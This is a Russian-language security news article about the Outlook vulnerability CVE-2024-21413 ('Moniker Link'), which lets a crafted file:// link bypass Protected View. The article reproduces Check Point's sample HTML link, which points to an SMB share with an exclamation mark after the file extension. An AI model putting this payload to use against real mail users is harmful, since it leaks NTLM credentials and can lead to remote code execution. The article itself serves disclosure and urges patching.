Компания Microsoft сообщает, что удаленные неаутентифицированные злоумышленники могут использовать критическую уязвимость в Outlook, которая позволяет обойти Office Protected View и добиться удаленного выполнения произвольного кода.

Эта уязвимость была обнаружена исследователями компании Check Point и получила идентификатор CVE-2024-21413. Она затрагивает ряд продуктов Office, включая Microsoft Office LTSC 2021 и Microsoft 365 Apps for Enterprise, а также Microsoft Outlook 2016 и Microsoft Office 2019.

Ошибка приводит к удаленному выполнению кода при открытии писем с вредоносными ссылками с помощью уязвимой версии Microsoft Outlook. Дело в том, что ошибка позволяет обойти Protected View (механизм, предназначенный для блокировки вредоносного содержимого, встроенного в файлы Office, путем открытия в режиме только для чтения) и открывать вредоносные файлы Office в режиме редактирования.

Разработчики предупредили, что панель предварительного просмотра тоже может стать вектором атаки, так как эксплуатировать CVE-2024-21413 можно даже через предварительный просмотр вредоносных документов.

«Злоумышленник, успешно эксплуатирующий эту уязвимость, может получить высокие привилегии, включающие функции чтения, записи и удаления, — поясняет Microsoft. — Злоумышленник может создать вредоносную ссылку для обхода Protected View, что приведет к утечке локальной учетной информации NTLM и удаленному выполнению кода (RCE)».

Аналитики Check Point дали уязвимости название Moniker Link, и рассказывают, что она позволяет обойти защиту Outlook от вредоносных ссылок, встроенных в электронные письма посредством file://. Нужно лишь добавить восклицательный знак к URL, который указывает на подконтрольные злоумышленникам серверы.

Восклицательный знак добавляется сразу после расширения документа вместе с произвольным текстом (в своем примере Check Point использовала слово «something»): *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

Такая ссылка обходит ограничения Outlook, и Outlook получает доступ к удаленному ресурсу \\\10.10.111.111\test\test.rtf при нажатии на ссылку, не отображая при этом никаких предупреждений или ошибок.

По словам исследователей, уязвимость связана с API MkParseDisplayName, поэтому может влиять и на другое ПО, которое его использует.

«Другие редакции и версии Office, вероятно, также затронуты этой проблемой. На самом деле, мы считаем, что эта ошибка оставалась незамеченной и существовала в экосистеме Windows/COM на протяжении десятилетий, поскольку в основе лежит COM API. Мы настоятельно рекомендуем всем пользователям Outlook как можно скорее установить официальный патч», — пишут в Check Point.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии